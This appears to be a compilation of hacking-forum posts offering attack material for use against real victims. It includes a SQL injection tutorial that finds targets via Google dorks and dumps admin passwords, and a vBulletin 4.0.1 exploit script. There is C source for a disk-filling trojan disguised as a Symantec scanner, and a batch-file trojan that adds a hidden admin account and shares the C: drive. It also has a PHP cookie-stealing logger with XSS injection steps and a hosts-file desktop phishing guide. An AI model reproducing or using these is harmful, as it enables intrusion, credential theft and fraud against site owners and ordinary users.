SQL INJECTION - TUTORIAL

Finding vunerability:
First of all we need a vunerable site as you all know

To find a vunerable site open google

Type in a dork like "inurl:index.php?id=" (without quotes)


Now click on any site like http://www.site.com/index.php?id=786

To test the vunerability of the site add a ' at the end of the site

If the site gives an error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1"

we can assume that it is vunerable.
Checking the number of columns:
To check the number of columns we do the following

http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below
http://www.site.com/index.php?id=-786 order by 2-- (no error)
similarly check
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- =>error

if we get an error at the 6 like "unknown column" that means there exists only 5 columns.
Finding vunerable columns:
To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786

NOw the url becomes

http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--

after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 3 are vunerable and data can be retrieved from colums 2 and 4

Finding Mysql version:
To find the sql version we replace 2 or 4 with @@version.
Now the url looks like

http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--

After hitting enter the sql version appears on the page

Lets assume we got 5.0.90-community-log on page which is sql version.
Getting Table names:
To get table names remove @@version from the url and replace it with table_name.

The url now becomes

http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--

After hitting enter the page shows the tablenames.

Lets us assume we got something like this

comment,log,admin,news,news_comment,members.
To take over the site we data should be retrieved from admin table.
Getting the column names:
To get the column names from the table admin we do the following

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--
Converting the tablename to ascii:
Convert the tablename to ascii here

http://www.getyourwebsitehere.com/jswb/t...ascii.html

The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;

Now remove &# and add a , between them

So now it is 97,100,109,105,110

Replace it in the place of ascii of the tablename

Now it is

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--

You can now see something like

username pwd gender email on page
Getting username and password:
To get the username and password we use

http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.

At this point we see username and password on page.

In some websites passwords are MD5 encrypted.Decrypt the passwords at http://www.md5decrypter.co.uk

This summary is not available. Please click here to view the post.

1.61.channel.facebook.com site-scripting (XSS)

1.61.channel.facebook.com site-scripting (XSS) Security researcher Edgard Chammas, has submitted on 02/04/2011 a cross-site-scripting (XSS) vulnerability affecting 1.61.channel.facebook.com, which at the time of submission ranked 2 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/04/2011. It is currently unfixed.

http://1.61.channel.facebook.com/iframe/...Cscript%3E

Havij – Advanced Automated SQL Injection Tool

 

[u]Havij – Advanced Automated SQL Injection Tool

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injection vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.[/u]
http://itsecteam.com/en/projects/project1.htm

wifite – Mass Wifi WEP/WPA Key Cracking Tool

wifite – Mass Wifi WEP/WPA Key Cracking Tool

wifite is created to to attack multiple WEP and WPA encrypted networks at the same time. This tool is customizable to be automated with only a few arguments and can be trusted to run without supervision.

Features

sorts targets by power (in dB); cracks closest access points first
all WPA handshakes are backed up (to wifite.py’s working directory)
mid-attack options: stop during attack with Ctrl+C to use (continue, move onto next target, skip to cracking, exit)
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
very customizable settings (timeouts, packets/sec, etc)
SKA support (untested)
finds devices in monitor mode; if none are found, prompts for selection
all passwords saved to log.txt
switching WEP attacks does not reset IVS
displays session summary at exit; shows any cracked keys

MY TROJAN -FOR KNOWLEDEGE PURPOSE ONLY

MY TROJAN

//THIS IS ABNORMAL TROJAN HORSE SOURCE CODE ONLY FOR EDUCATION //PURPOSE ONLY

#include
#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}

MD5 Cracker [perl]

Code:

#!/usr/bin/perl
use Digest::MD5 qw( md5_hex );
use LWP::UserAgent;
use HTTP::Request::Common;

print "MD5 Hash ToolKit [mr.pr0n]";

#*************************** [Main Menu] ******************************
menu:;
print "\nMenu:\n";
print " 1. Create your MD5 Hash. \n";
print " 2. Crack your MD5 Hash with Dictionary Attack.\n";
print " 3. Crack your MD5 Hash with Brute Force Attack.\n";
print " 4. Search for your MD5 Hash.\n";
print " 5. Exit.\n";
print "\nOption: ";
$option=;

if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5)
{
print "Oups!Wrong Option!!\n";
goto menu;
}
# Epilogh Option
if ($option==1)
{&create_md5}
if ($option==2)
{&dic_attack}
if ($option==3)
{&brute_attack}
if ($option==4)
{&search_md5}
if ($option==5)
{&quit}

#****************************** [Option 1] ******************************
sub create_md5
{
$word;
print "MD5 Hash Creator\n";
print "Give me your word: ";
$word = ;
chomp($word);
print "MD5 Hash is: ", md5_hex("$word"), "\n\n";
goto menu;
}
#****************************** [Option 2] ******************************
sub dic_attack
{
print "MD5 [Worldlist] Cracker [mr.pr0n]\n";
print "Enter MD5: ";
chomp($hash = );
if(length($hash)!=32)
{
die "$hash is NOT valid\n";
}
$words="passes.txt";
open (WORDLIST, $words);
print "Wordlist opened successfully!\n";
   @wordlist = ;
   for ($i = 0; $i < @wordlist; $i++){
      $h = $wordlist[$i];
       chomp($h);
        $dec=md5_hex($h);
       if($dec eq $hash){
         die "[+]Your password is: $h\n";}
}
print "[-]Not Cracked!!\n";
goto menu;
}
#****************************** [Option 3] ******************************
sub brute_attack
{
$min=1;
$max=10;
print "MD5 [BruteForce] Cracker [mr.pr0n]\n";
print "Enter Type: ";
chomp($type = );
if ($type=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($type=~"A") {
$alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($type=~"1") {
$alpha = $alpha."1234567890";}
if ($type=~"!") {
$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}
print "Enter MD5: ";
chomp($md5 = );
if(length($md5)!=32)
{die "$md5 is NOT valid\n";}
for ($j=1; $j<=10; $j++)
{mainbrute ($j);}
sub mainbrute
{
$CharSet = shift;
@RawString = ();
for ($i =0;$i<$CharSet;$i++){ $Brute[i] = 0;}
do{
for ($i =0; $i<$CharSet; $i++){
if ($Brute[$i] > length($alpha)-1){
if ($i==$CharSet-1){
print "�?h Shit!\nNo Results with type '$type' and $Chars chars.\n";
$try=0;
return false;
}
$Brute[$i+1]++;
$Brute[$i]=0;
}}
$pass = "";
for ($i =0;$i<$CharSet;$i++)
{
$pass = $pass . substr($alpha,$Brute[$i],1);
}
$hash = md5_hex($pass);
$try++;
print "$hash ($pass)\n";
if ($md5 eq $hash)
{
print "\n**FOUND PASSWORD** [ $pass ]\nTried $try passwords \n";
goto menu;
}
$Brute[0]++;
}while($Brute[$CharSet-1]
}
goto menu;
}
#****************************** [Option 4] ******************************
sub search_md5
{
print "Search for your MD5 Hash\n";
print "(�?atch your MD5 hash with six most famous online databases)";
print "\nEnter MD5: ";
chomp($hash = );
if(length($hash)!=32)
{
die "$hash is NOT valid\n";
}
$lwp = LWP::UserAgent->new;

#**** [md5oogle]****
$crack = "http://www.md5oogle.com/decrypt.php?input=$hash&meta=01";
$request = $lwp->request(HTTP::Request->new(GET=>$crack));
$c = $request->content =~ /Result: (.*?)<\/b>/;
if ($c) {
print "[md5oogle] Password: $1\n";
} else {

#**** [md5decrypter]****
$url = 'http://www.md5decrypter.com/index.php';
$response = LWP::UserAgent->new->post( $url, [ "hash" => $hash ] );
die "$url error: ", $response->status_line
unless $response->is_success;
die "Weird content type at $url -- ", $response->content_type
unless $response->content_type eq 'text/html';
if( $response->content =~ /Normal Text: <\/b>(.+)/ ) {
print "[md5Decrypter] Password: $1\n";
} else {

#**** [passcracking]****
$url = 'http://passcracking.ru/index.php';
$response = LWP::UserAgent->new->post( $url, [ "datafromuser" => $hash ] );
die "$url error: ", $response->status_line
unless $response->is_success;
die "Weird content type at $url -- ", $response->content_type
unless $response->content_type eq 'text/html';
if( $response->content =~ /(.+)<\/td>/ ) {
print "[PassCracking] Password: $1\n";
} else {

#**** [hashchecker] ****
$url = 'http://www.hashchecker.com/index.php';
$response = LWP::UserAgent->new->post( $url, [ "search_field" => $hash ] );
die "$url error: ", $response->status_line
unless $response->is_success;
die "Weird content type at $url -- ", $response->content_type
unless $response->content_type eq 'text/html';
if( $response->content =~ /

$hash is (.+)<\/b>/ ) {
print "[HashChecker] Password: $1\n";
} else {

#**** [Milw0rm] ****
$ua = $lwp->request(POST 'http://www.milw0rm.com/cracker/search.php',
[ hash => "$hash", Submit => 'Submit', ] );
@content = split(/[n]/, $ua->content);
@password = split( /[><]/, $content[47]);
if($password[1]) {
print "[Milw0rm] Password: $password[1]\n";
}else {

#**** [GdataOnline] ****
$gdo = $lwp->request(GET 'http://gdataonline.com/qkhash.php?mode=xml&hash='.$hash);
@content = split(//, $gdo->content);
@password = split( /[><]/, $content[1]);
if(@password[0]) {
print "[GdataOnline] Password: $password[0]\n";
}
else { print " Password Not Found!!"; }
}}}}}
goto menu;
}
#****************************** [Option 5] ******************************
sub quit
{
exit(1);
}
#****************************** [The End] *******************************

 

 

 

 

 

 

 

 

 

 

Save it as anything.pl
You must have Active Perl installed. Google it
Go to CMD and type:
cd [place where it is saved]
ex. cd Desktop
then: perl anything.pl

---

DLL Hijacking Tool

Hi Everyone,

Check out this: http://securityxploded.com/dllhijackauditor.php

This is a very simple and easy tool to find DLL Hijacking Vuln. (which recently became very popular) in your 32 Bit Applications. Although, DLL Hijacking is not very useful since user action is required plus Exploit needs to be put in an DLL File and transferred.

Try a few applications and I am sure you'll find something.[/align]

vBulletin 4.0.1 hack

vBulletin 4.0.1 hack

Ahhh found a SQL vulnerability in vBulletin 4.0.1 ... works on many forums i tried on which r not patchd ... ...

but cracking da md5 is a painnnn ...grrrrrr

Quote:#!/usr/bin/perl

use IO::Socket;


print q{
#######################################################################
# vBulletin Version 4.0.1 Remote SQL Injection Exploit #
# Dork: Powered by vBulletin Version 4.0.1 #
#######################################################################
};

if (!$ARGV[2]) {

print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid

perl VB4.0.1.pl http://www.vbulletin.com /forum/ 1


};

}


$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ​ ​ ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

}
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";

well i myself dint find out this exploit.. n respct da oneZ who found it.... but hey... it wrksZZz sooo dun care much

Making your own trojan in a .bat file

Open a dos prompt we will only need a dos prompt , and windows xp…

-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

———————- Starting ——————-
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

SESSION HIJACKING TUTORIAL -STEP BY STEP

SESSION HIJACKING TUTORIAL

Session hijacking:

Session hijacking is the process of exploiting valid computer session which involves stealing the victim's cookie.

so now,let's understand the below.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

The following is a cookie stealing script which is to be stored in attacker's host.It recieves the cookie data and stores to a text file.

PHP Code:


function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))$ip = $_SERVER['REMOTE_ADDR'];
else$ip = "unknown";
return($ip);
}

function logData()
{$ipLog="log.txt";$cookie = $_SERVER['QUERY_STRING'];$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];$user_agent = $_SERVER['HTTP_USER_AGENT'];$rqst_method = $_SERVER['METHOD'];$rem_host = $_SERVER['REMOTE_HOST'];$referer = $_SERVER['HTTP_REFERER'];$date=date ("l dS of F Y h:i:s A");$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
elsefputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");fclose($log);
}
logData();
?>

Save the script as a cookielogger.php in your server.(Any free web hosting sites like justfree,x10hosting etc..)
Also create an empty text file and name it as log.txt and upload it.

Now we come to the hardest part where we have to inject a piece of javascript into sites html page,which the victims has to visit.We should now look for a place to post the javascript.

Look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:

Click here!

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:





All the details like cookie,ipaddress,browser of the victim are logged in to log.txt in your host.

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account.

---

Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don't forget to add rep if you like my post.

---

MONITOR YOUR EMPLOYEES & STUDENT

Hello Hackers Club Members !!!!

Today I'm going to tell you how to monitor activities of our Student / Employees.

This Software is dedicated for the Administrator/Owner of any Training Institiute or Company to Monitor the activities of their Employees or Students.

Net Monitor for Employees Professional

Net Monitor for Employees Professional allows you to see screens of computers connected to the network. This way you can observe what your employees are doing! Additionally, you have the ability to take control of a remote computer by
controlling the mouse and keyboard. You can record remote computers screens even when you are not monitoring them. When your employees need instructions, you can show them your desktop. To increase your efficiency the console now include several tolls that can be executed on all or just selected remote computers. When you need attention you can send a message to employees and/or lock the remote computer.

What are the major benefits of using Net Monitor for Employees Professional ?

*   For monitoring and recording your employees activities on a remote computers

*   For preventing internet browsing on remote computers

*   For starting and stopping applications and processes on remote computers.

*   For monitoring students in the classroom to achieve better discipline or, just to assist them when they are in trouble (by using the remote control feature).

*   For administrating all computers just from one location – your computer.

*   For presenting your screen to students.

*   For locking students computers while they are waiting for further instructions or assignments.

*   Helping your students by showing your desktop to them.

*   Turning off, restarting, .... remote computers with one click.

*   Schedule remote computers desktop recording to AVI files

*   Execute several actions on all remote computers with on click

*   Block internet access

Enjoy With Us....

Share your Ideas...

Desktop Phishing Tutorial - Step By Step Explained

 It is an advance form of phishing. Kindly read my previous post on normal phishing herebefore proceeding.Difference between phishing and desktop phishing is as follows.

In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.

3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-

1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.

2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.

3. Rest of the things are same as in normal phishing.

What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them Location of hosts file in windows: C:\Windows\System32\drivers\etc\ 

Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would

be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?

I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-

1. Create and host phishing page on your computer.

2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.

Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc  and victim's hosts file get replaced by our modified hosts file.

Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.

Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts

echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 

Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 

When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-

1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.

2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-

Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure